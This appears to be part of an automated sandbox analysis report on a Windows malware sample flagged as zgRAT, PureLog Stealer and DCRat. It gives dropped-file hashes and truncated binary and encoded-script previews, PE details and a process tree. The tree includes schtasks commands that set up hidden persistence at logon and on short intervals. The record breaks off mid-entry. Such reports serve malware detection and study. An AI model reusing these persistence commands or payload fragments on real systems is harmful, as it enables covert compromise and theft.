                                                          SHA-512:31E593DEC35C01A3871E8726DAF05F290989E60728CF79F574D2A8D49D92F9997CD9C1A8195256CE09B36D10DB6AFACF3A9C625A7FA2D7FD5218DFFCEB1ED3C6
                                                          Malicious:false
                                                          Preview:jxTdE5sp4NTPvoBIlKMzY0rpQrK5k7U0qxbinqYafv1TQP1zjF0x0PLsGoMWvwF72ci7Mde4vwTn8XZB0UWeGg9amtb8dBpsp4axq4mGl5BE5ittPLgaal1WcIVdCfbuHl7E6lV6sP3Ke5eE9rtSeORECEVhiJDFeR7Ukpxn0ksKrr1hoQeUwJP2T3C1QxXiMypN8KeT4Fb4gGWVNx3SotSVBEAqm5WDMJ83BnjdwKaqrUVNgrnc3E4dfUL3Kxr8tYrXHdTkOZgeSmorswJ5R3JHOfXrbqT8db7Sm8FDXDOdiaK3qeKXowrzPjIlGmIiGhB1oVEurGhNppjyVdA7f6UruIDD0d6v5qXBYSPUaaphOdJjATQmlKCKNTHgSB3NJwS9ShZDOqhEQxcQ8dCgNUJunMxFKtBZgbXcKKRc3MY5n84a10hz8XAzmhVFuU2eoIiyZAFyMjnA5OHpSXNULMaJbhznyLsiU3QfZFA0utnYtA4YZqxWHiTcrYX1Lc9A1EpB8mPMXWjcjBZbnaNIYWbwkxyBsJpStmhoU2axbk9u813p85NvO1men3bKxNeNrQs6euGvA
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3861504
                                                          Entropy (8bit):7.835766949495404
                                                          Encrypted:false
                                                          SSDEEP:98304:SlFTtIkKJ8h91Zv7aphwzT8YRMR9UOu93dI:S7SF8/baTm8kMPUOu9
                                                          MD5:798B5560B2A2C6596A0C1A09419AD2C4
                                                          SHA1:6F18005EAACE373EE3EC23138C7D5AF9D1BCB51E
                                                          SHA-256:93DC0D7CACC55D4965A1D55A3D163125481EE2BE7CEF9640320F58D714BD8011
                                                          SHA-512:ED88BAD4B7E2103222EFC1864E36A6B6D9E83396361191C6D9ED0623BADB783629E87A2CC2097D4D79586D9514D02D15DF7B411C1A012BEB212009EFE2E24010
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe, Author: Joe Security
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................:...........;.. ... ;...@.. .......................`;...........@...................................;.K.... ;.p....................@;...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...p.... ;.......:.............@....reloc.......@;.......:.............@..B..................;.....H...........@.......e...D....)0.'.;......................................0..........(.... ........8........E....)...M.......q...8$...(.... ....~....{....:....& ....8....(.... ....~....{~...:....& ....8....(.... ....~....{{...9....& ....8z...*...0..<....... ........8........E............................d...8)...~....9U... ....~....{....:....& ....8....~....(#... .... .... ....s....~....('....... ....8{......... ....~....{....9a...& ....8V...8z... ....~....{....9=...& ....82...
                                                          Process:C:\Users\user\Desktop\f3I38kv.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):213
                                                          Entropy (8bit):5.80588670543794
                                                          Encrypted:false
                                                          SSDEEP:6:GcgwqK+NkLzWbH/PlyrFnBaORbM5nCeHJCD0Lpj:GuMCzWLHUhBaORbQCmxV
                                                          MD5:A0282A6958AFC151A410D7128B0D80ED
                                                          SHA1:6F4BA3C7EBAA16F6BB69594ADECB05BCCAF308FE
                                                          SHA-256:329D081C702EB5E7F60896CECC15A5A0D2B625E93012B1FF7F7A8F64B3BAEAE2
                                                          SHA-512:EEB9ADA5C9D533E1ED377E6D1D6B905A244BA6190FB8227967F59D37779727FDB0165C0B3AAC866A8A0BD009E9903563762FB2879E058F9E6D12452D87F5B58C
                                                          Malicious:false
                                                          Preview:#@~^vAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v {!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8^W134MWSd+MNsV;WhhKxzJtjnDM}.f,gftl 4COr~~!B~0mVdnuDsAAA==^#~@.
                                                          Process:C:\Users\user\Desktop\f3I38kv.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):108
                                                          Entropy (8bit):5.124599308836479
                                                          Encrypted:false
                                                          SSDEEP:3:le3jT8+Lgf5kJYyQEf6yA4ISXq7LVA31faA:w3jTH0fQYqf6yA4Ik8O3hL
                                                          MD5:DE89329E5614F1630F511924AC734AA5
                                                          SHA1:FC499E64667F681414B952788B1220806D404E3B
                                                          SHA-256:F8A9353FECFF5FE9131AB909940A15B593C8B74D89F4624890D30B6BAFD00931
                                                          SHA-512:EF266DAD8204188A1CF59AFF63E0CBD1A649CBF5CE42F5F1464A7F508CE7FAAB6AA05C2D42849BD3FE1F86DECC380773A6D12F31F24762CBC8506CF1C391BF38
                                                          Malicious:false
                                                          Preview:%ewotC%%PJfwKZHW%..%NYbuWfgafPADIB%"C:\blockbrowserdllCommon/hyperruntimemonitorCommon.exe"%cGXtvBYCJGKgHem%
                                                          Process:C:\Users\user\Desktop\f3I38kv.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3861504
                                                          Entropy (8bit):7.835766949495404
                                                          Encrypted:false
                                                          SSDEEP:98304:SlFTtIkKJ8h91Zv7aphwzT8YRMR9UOu93dI:S7SF8/baTm8kMPUOu9
                                                          MD5:798B5560B2A2C6596A0C1A09419AD2C4
                                                          SHA1:6F18005EAACE373EE3EC23138C7D5AF9D1BCB51E
                                                          SHA-256:93DC0D7CACC55D4965A1D55A3D163125481EE2BE7CEF9640320F58D714BD8011
                                                          SHA-512:ED88BAD4B7E2103222EFC1864E36A6B6D9E83396361191C6D9ED0623BADB783629E87A2CC2097D4D79586D9514D02D15DF7B411C1A012BEB212009EFE2E24010
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, Author: Joe Security
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................:...........;.. ... ;...@.. .......................`;...........@...................................;.K.... ;.p....................@;...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...p.... ;.......:.............@....reloc.......@;.......:.............@..B..................;.....H...........@.......e...D....)0.'.;......................................0..........(.... ........8........E....)...M.......q...8$...(.... ....~....{....:....& ....8....(.... ....~....{~...:....& ....8....(.... ....~....{{...9....& ....8z...*...0..<....... ........8........E............................d...8)...~....9U... ....~....{....:....& ....8....~....(#... .... .... ....s....~....('....... ....8{......... ....~....{....9a...& ....8V...8z... ....~....{....9=...& ....82...
                                                          Process:C:\Windows\System32\PING.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):502
                                                          Entropy (8bit):4.630609828667227
                                                          Encrypted:false
                                                          SSDEEP:12:P8w5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:0ydUOAokItULVDv
                                                          MD5:CB032DDF000B7094D5EA82C709AFE96C
                                                          SHA1:3754ACCC5A2DAE8C62B9600778FBC224B7EC1113
                                                          SHA-256:27C38D45A3229A073632DCA0544E3D32323237BF0A2F9794E4D7750F17FC9563
                                                          SHA-512:8BB0C8DFE82DC0F4EF0D0B4D1275476A4FE71D4C10B4D3160F9F432F3D0308945D6E8A5B2BA0CD8BD5FE94C8E1C0612A5DCB980750065AC6CA8DDFE13BE560D1
                                                          Malicious:false
                                                          Preview:..Pinging 992547 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.791111156313075
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:f3I38kv.exe
                                                          File size:4'183'320 bytes
                                                          MD5:71e2bab6de31ab3476ac7529a603de1c
                                                          SHA1:ce92b47562732cb095b318f2e5cf0f5bf7fb4b68
                                                          SHA256:c4dda91a7666f799687ecc6998b0676dd19c4545b381271d01c0400274d18c55
                                                          SHA512:d4ba63e37ba1832fceb930c3f0141321ba8a0783dd5ad862ab701ff5bddba3af5be771e26c972896cc3043224b7bf05da9b13aee10dc1a776063f7c1150d92d7
                                                          SSDEEP:98304:yQlFTtIkKJ8h91Zv7aphwzT8YRMR9UOu93dIl:v7SF8/baTm8kMPUOu9G
                                                          TLSH:0616F106B6915F33D1693F3194F7142E52B0EB626623DF0B3E1F20E5E9092708B566FA
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                          Icon Hash:1515d4d4442f2d2d
                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                          Instruction
                                                          call 00007F1530BF060Bh
                                                          jmp 00007F1530BEFF1Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007F1530BE2D67h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007F1530BF33AFh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007F1530BF00ACh
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007F1530BEF669h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F1530BE2CE2h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F1530BF2E69h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F1530BF0028h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F1530BF2E4Ch
                                                          int3
                                                          jmp 00007F1530BF48E7h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                          PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                          RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                          RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                          RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                          RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                          RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                          RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                          RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                          RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                          RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                          RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                          RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                          RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                          RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                          RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                          RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                          RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                          RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                          RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                          RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                          RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                          RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                          RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                          RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                          RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                          RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                          DLLImport
                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          No network behavior found

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:07:17:56
                                                          Start date:30/12/2024
                                                          Path:C:\Users\user\Desktop\f3I38kv.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\f3I38kv.exe"
                                                          Imagebase:0x4f0000
                                                          File size:4'183'320 bytes
                                                          MD5 hash:71E2BAB6DE31AB3476AC7529A603DE1C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1659074697.0000000005326000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1658269779.0000000005214000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:07:17:56
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe"
                                                          Imagebase:0x180000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:07:18:24
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockbrowserdllCommon\ZUKrGOW39NDMa.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:07:18:24
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:07:18:24
                                                          Start date:30/12/2024
                                                          Path:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\blockbrowserdllCommon/hyperruntimemonitorCommon.exe"
                                                          Imagebase:0xa00000
                                                          File size:3'861'504 bytes
                                                          MD5 hash:798B5560B2A2C6596A0C1A09419AD2C4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000000.1936497024.0000000000A02000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 10 /tr "'C:\Recovery\SIHClient.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SIHClient" /sc ONLOGON /tr "'C:\Recovery\SIHClient.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SIHClient.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
